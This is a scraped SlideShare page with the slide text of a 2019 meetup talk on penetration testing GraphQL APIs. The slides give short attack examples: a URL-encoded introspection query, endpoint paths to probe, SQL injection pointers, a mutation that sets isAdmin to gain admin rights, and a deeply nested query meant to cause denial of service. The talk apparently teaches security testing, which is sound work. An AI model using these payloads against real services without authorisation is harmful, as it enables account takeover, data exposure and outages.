SlideShare a Scribd company logo

Pentest Application With GraphQL | Null Bangalore Meetup

Download as PPT, PDF
D
Divyanshu

GraphQL pentesting | null Bangalore Meet 21 September 2019 Null/Owasp/G4H Medium: https://lnkd.in/fuzGrMU My Twitter: https://lnkd.in/fsiFva6

Education
1 of 21
Pentest Application With GraphQL Presented By: Divyanshu Shukla (@justm0rph3u5) @justm0rph3u5 @justm0rph3u5
Agenda • What is GraphQL • REST vs GraphQL • Example for REST/GraphQL • Architecture • Basics • Pentesting GraphQL
What Is GraphQL? • New API standard that was invented and open-sourced by Facebook. • GraphQL is a query language for APIs - not databases. • It is database agnostic and effectively can be used in any context where an API is used. • GraphQL enables declarative data fetching. • GraphQL is used in production by multiple companies such as GitHub, Twitter, Coursera, etc.
REST vs GraphQL? • Multiple Round Trips To Fetch Related Resources. • Over Fetching / Under Fetching. • Rapid Product Iterations on the Frontend. • Benefits of a Schema & Type System
REST vs GraphQL Example
REST Example
GraphQL Example
Architecture Ref: https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
Basics Terminology • Schema Definition Language . Object Types & Fields • Arguments . Aliases • Fragments . Variables • Directives • Types of Requests: oQuery oMutations oSubscriptions
Pentesting GraphQL • Tools • Enumeration • Introspection • SQL Injection • Information Disclosure • Broken Access Control • Authorization Bypass • Brute Force/Denial Of Service
Tools • Altair GraphQL Client/GraphQL ide. • GraphQL Raider (Burp Suite Extension). • GraphQL_Introspection.py (Python script by Doyensec). • GraphQL Vyoger (https://apis.guru/graphql-voyager/).
GraphQL Tip • Pentesting an app that uses GraphQL? POST is more common, but remember that it accepts GET too. URL encode & hit /graphql?query=. Eg, a 'schema' request as GET: https://example.com/graphql?query= {__schema%20{%0atypes%20{%0an ame%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a} Thanks to https://twitter.com/coffeetocode
Enumeration • Look for traffic sent via server to find graphql endpoint. o/graphql/ o/graphql/console/ o/graphql.php o/graphiql/ o/graphiql.php • Try sending a request to API and error is : “Syntax Error: Expected Name, found }”. This confirms graphql. • GraphQL endpoints may have a GUI, if present we can check Docs directly.
Introspection • GraphQL allows querying to get metadata via introspection query to find out about the schema with description of data. • It is similar to information_schema tables in databases. • It allows attacker to find what requests exist/what arguments should be passed. • GraphQL Introspection Query: https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d • Developers can disable this feature but majority of applications leave it open. • Hands-On : Hackerone Ref: https://graphqlmastery.com/blog/graphql-introspection- and-introspection-queries
Injection • Most of the applications are connected with any database. So there is a high chance for SQL injection, NoSQL injection and other injections. • Detecting SQL injection and exploiting it using UNION SELECT. • Also using sqlmap for exploitation. • There are high chance that application may have multiple parameters vulnerable to SQL injections. • Example : https://blog.usejournal.com/time-based-blind-sql-injection-in- graphql-39a25a1dfb3c • Hands On: https://pentesterlab.com/exercises/graphql_ii/course
Information Disclosure • GraphQL is just a layer between client apps and the database. • Try visiting url/graphql.php?debug=1 to find debug mode and additional error reporting. • Inserting single quote/double quote to find out error related to server and graphql. • Going through the id values/userquery, we will be able to get information about other users (or maybe not, if everything is configured correctly).
Broken Access Control • Broken Access control may allow attacker use admin email and brute-force login credentials to get admin level access. • Steps to reproduce: • Accessing other users profile details like id, email. • Vulnerable graphql query: query{ users{ id email isAdmin isActive } }
Authorization Bypass • Suppose we can create users: mutation { createPerson (username: ”User1", password: ”user1") { } } • Assuming that there is a certain isAdmin parameter in the handler on the server, we can send a request of the form: mutation { createPerson (username: ”User1", password: ”user1", isAdmin: True) { } } • And make the user User1 an administrator.
Brute Force/Denial Of Service • Brute forcing email, id, etc parameters. • Brute forcing mutation and other similar queries. • Low privilege or non-admin user can view details by brute-forcing login credentials where rate limiting is not present. • Nested queries can cause denial of service to the application. query { stories{ title body comments{ comment author{ comments{ author{ comments{ comment author{ comments{ comment author{ comments{ comment author{ name }} } } } } } } } } } }
Reference • https://github.com/graphql/graphiql • https://www.slideshare.net/NeeluTripathy2/pentesting-graphql- applications • https://prog.world/pentest-applications-with-graphql/ • https://www.howtographql.com • https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli- vulnerabilities-5d39f26cea2e • https://blog.doyensec.com/2018/05/17/graphql-security-overview.html • https://voidsec.com/graphql-security-overview-and-testing-tips/ • https://ctf.hacker101.com • https://pentesterlab.com/exercises/graphql_ii/course
Pentest Application With GraphQL | Null Bangalore Meetup

Recommended

Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL ApplicationsNeelu Tripathy
 
Attacking and defending GraphQL applications: a hands-on approach
Attacking and defending GraphQL applications: a hands-on approach Attacking and defending GraphQL applications: a hands-on approach
Attacking and defending GraphQL applications: a hands-on approachDavide Cioccia
 
GraphQL Security
GraphQL SecurityGraphQL Security
GraphQL SecurityShiu-Fun Poon
 
DVGA writeup
DVGA writeupDVGA writeup
DVGA writeupYu Iwama
 
Attacking GraphQL
Attacking GraphQLAttacking GraphQL
Attacking GraphQLKavishaSheth1
 
Hashicorp Vault ppt
Hashicorp Vault pptHashicorp Vault ppt
Hashicorp Vault pptShrey Agarwal
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 

Recommended

Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL ApplicationsNeelu Tripathy
 
Attacking and defending GraphQL applications: a hands-on approach
Attacking and defending GraphQL applications: a hands-on approach Attacking and defending GraphQL applications: a hands-on approach
Attacking and defending GraphQL applications: a hands-on approachDavide Cioccia
 
GraphQL Security
GraphQL SecurityGraphQL Security
GraphQL SecurityShiu-Fun Poon
 
DVGA writeup
DVGA writeupDVGA writeup
DVGA writeupYu Iwama
 
Attacking GraphQL
Attacking GraphQLAttacking GraphQL
Attacking GraphQLKavishaSheth1
 
Hashicorp Vault ppt
Hashicorp Vault pptHashicorp Vault ppt
Hashicorp Vault pptShrey Agarwal
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Introducing Swagger
Introducing SwaggerIntroducing Swagger
Introducing SwaggerTony Tam
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
 
RESTful API - Best Practices
RESTful API - Best PracticesRESTful API - Best Practices
RESTful API - Best PracticesTricode (part of Dept)
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST APINutan Kumar Panda
 
Penetration Testing AWS
Penetration Testing AWSPenetration Testing AWS
Penetration Testing AWSSanjeev Kumar Jaiswal
 
ELK Stack
ELK StackELK Stack
ELK StackPhuc Nguyen
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurationsMegha Sahu
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
CONDG April 23 2020 - Baskar Rao - GraphQL
CONDG April 23 2020 - Baskar Rao - GraphQLCONDG April 23 2020 - Baskar Rao - GraphQL
CONDG April 23 2020 - Baskar Rao - GraphQLMatthew Groves
 
GraphQL and its schema as a universal layer for database access
GraphQL and its schema as a universal layer for database accessGraphQL and its schema as a universal layer for database access
GraphQL and its schema as a universal layer for database accessConnected Data World
 

More Related Content

What's hot

Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Introducing Swagger
Introducing SwaggerIntroducing Swagger
Introducing SwaggerTony Tam
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurationsMegha Sahu
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 

What's hot (20)

Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & Testing
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Introducing Swagger
Introducing SwaggerIntroducing Swagger
Introducing Swagger
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
 
RESTful API - Best Practices
RESTful API - Best PracticesRESTful API - Best Practices
RESTful API - Best Practices
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Penetration Testing AWS
Penetration Testing AWSPenetration Testing AWS
Penetration Testing AWS
 
ELK Stack
ELK StackELK Stack
ELK Stack
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 

Similar to Pentest Application With GraphQL | Null Bangalore Meetup

CONDG April 23 2020 - Baskar Rao - GraphQL
CONDG April 23 2020 - Baskar Rao - GraphQLCONDG April 23 2020 - Baskar Rao - GraphQL
CONDG April 23 2020 - Baskar Rao - GraphQLMatthew Groves
 
GraphQL and its schema as a universal layer for database access
GraphQL and its schema as a universal layer for database accessGraphQL and its schema as a universal layer for database access
GraphQL and its schema as a universal layer for database accessConnected Data World
 
APIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBM
APIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBMAPIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBM
APIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBMapidays
 
APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...
APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...
APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...apidays
 
Introduction to GraphQL
Introduction to GraphQLIntroduction to GraphQL
Introduction to GraphQLRodrigo Prates
 
GraphQL API Gateway and microservices
GraphQL API Gateway and microservicesGraphQL API Gateway and microservices
GraphQL API Gateway and microservicesMohammed Shaban
 
Tutorial: Building a GraphQL API in PHP
Tutorial: Building a GraphQL API in PHPTutorial: Building a GraphQL API in PHP
Tutorial: Building a GraphQL API in PHPAndrew Rota
 
Introduction to Testing GraphQL Presentation
Introduction to Testing GraphQL PresentationIntroduction to Testing GraphQL Presentation
Introduction to Testing GraphQL PresentationKnoldus Inc.
 
Testing Graph QL Presentation (Test Automation)
Testing Graph QL Presentation (Test Automation)Testing Graph QL Presentation (Test Automation)
Testing Graph QL Presentation (Test Automation)Knoldus Inc.
 
How to provide a GraphQL API - I want it that way
How to provide a GraphQL API - I want it that wayHow to provide a GraphQL API - I want it that way
How to provide a GraphQL API - I want it that wayQAware GmbH
 
GraphQL-ify your APIs - Devoxx UK 2021
GraphQL-ify your APIs - Devoxx UK 2021 GraphQL-ify your APIs - Devoxx UK 2021
GraphQL-ify your APIs - Devoxx UK 2021Soham Dasgupta
 
GraphQL_devoxx_2023.pptx
GraphQL_devoxx_2023.pptxGraphQL_devoxx_2023.pptx
GraphQL_devoxx_2023.pptxSoham Dasgupta
 
Implementing OpenAPI and GraphQL services with gRPC
Implementing OpenAPI and GraphQL services with gRPCImplementing OpenAPI and GraphQL services with gRPC
Implementing OpenAPI and GraphQL services with gRPCTim Burks
 
Introduction to GraphQL Presentation.pptx
Introduction to GraphQL Presentation.pptxIntroduction to GraphQL Presentation.pptx
Introduction to GraphQL Presentation.pptxKnoldus Inc.
 
aip-workshop1-dev-tutorial
aip-workshop1-dev-tutorialaip-workshop1-dev-tutorial
aip-workshop1-dev-tutorialMatthew Vaughn
 
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)Shift Conference
 
London React August - GraphQL at The Financial Times - Viktor Charypar
London React August - GraphQL at The Financial Times - Viktor CharyparLondon React August - GraphQL at The Financial Times - Viktor Charypar
London React August - GraphQL at The Financial Times - Viktor CharyparReact London Community
 
GraphQL with .NET Core Microservices.pdf
GraphQL with .NET Core Microservices.pdfGraphQL with .NET Core Microservices.pdf
GraphQL with .NET Core Microservices.pdfKnoldus Inc.
 
Adding GraphQL to your existing architecture
Adding GraphQL to your existing architectureAdding GraphQL to your existing architecture
Adding GraphQL to your existing architectureSashko Stubailo
 

Similar to Pentest Application With GraphQL | Null Bangalore Meetup (20)

CONDG April 23 2020 - Baskar Rao - GraphQL
CONDG April 23 2020 - Baskar Rao - GraphQLCONDG April 23 2020 - Baskar Rao - GraphQL
CONDG April 23 2020 - Baskar Rao - GraphQL
 
GraphQL and its schema as a universal layer for database access
GraphQL and its schema as a universal layer for database accessGraphQL and its schema as a universal layer for database access
GraphQL and its schema as a universal layer for database access
 
APIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBM
APIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBMAPIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBM
APIdays Helsinki 2019 - GraphQL API Management with Amit P. Acharya, IBM
 
APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...
APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...
APIdays Helsinki 2019 - Beyond REST: GraphQL API Management with Amit Acharya...
 
Introduction to GraphQL
Introduction to GraphQLIntroduction to GraphQL
Introduction to GraphQL
 
GraphQL API Gateway and microservices
GraphQL API Gateway and microservicesGraphQL API Gateway and microservices
GraphQL API Gateway and microservices
 
Tutorial: Building a GraphQL API in PHP
Tutorial: Building a GraphQL API in PHPTutorial: Building a GraphQL API in PHP
Tutorial: Building a GraphQL API in PHP
 
Introduction to Testing GraphQL Presentation
Introduction to Testing GraphQL PresentationIntroduction to Testing GraphQL Presentation
Introduction to Testing GraphQL Presentation
 
Testing Graph QL Presentation (Test Automation)
Testing Graph QL Presentation (Test Automation)Testing Graph QL Presentation (Test Automation)
Testing Graph QL Presentation (Test Automation)
 
How to provide a GraphQL API - I want it that way
How to provide a GraphQL API - I want it that wayHow to provide a GraphQL API - I want it that way
How to provide a GraphQL API - I want it that way
 
GraphQL-ify your APIs - Devoxx UK 2021
GraphQL-ify your APIs - Devoxx UK 2021 GraphQL-ify your APIs - Devoxx UK 2021
GraphQL-ify your APIs - Devoxx UK 2021
 
GraphQL
GraphQLGraphQL
GraphQL
 
GraphQL_devoxx_2023.pptx
GraphQL_devoxx_2023.pptxGraphQL_devoxx_2023.pptx
GraphQL_devoxx_2023.pptx
 
Implementing OpenAPI and GraphQL services with gRPC
Implementing OpenAPI and GraphQL services with gRPCImplementing OpenAPI and GraphQL services with gRPC
Implementing OpenAPI and GraphQL services with gRPC
 
Introduction to GraphQL Presentation.pptx
Introduction to GraphQL Presentation.pptxIntroduction to GraphQL Presentation.pptx
Introduction to GraphQL Presentation.pptx
 
aip-workshop1-dev-tutorial
aip-workshop1-dev-tutorialaip-workshop1-dev-tutorial
aip-workshop1-dev-tutorial
 
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)
 
London React August - GraphQL at The Financial Times - Viktor Charypar
London React August - GraphQL at The Financial Times - Viktor CharyparLondon React August - GraphQL at The Financial Times - Viktor Charypar
London React August - GraphQL at The Financial Times - Viktor Charypar
 
GraphQL with .NET Core Microservices.pdf
GraphQL with .NET Core Microservices.pdfGraphQL with .NET Core Microservices.pdf
GraphQL with .NET Core Microservices.pdf
 
Adding GraphQL to your existing architecture
Adding GraphQL to your existing architectureAdding GraphQL to your existing architecture
Adding GraphQL to your existing architecture
 

Recently uploaded

Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDThiyagu K
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxShobhayan Kirtania
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...Sapna Thakur
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Disha Kariya
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxVS Mahajan Coaching Centre
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfJayanti Pande
 

Recently uploaded (20)

Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptx
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
 
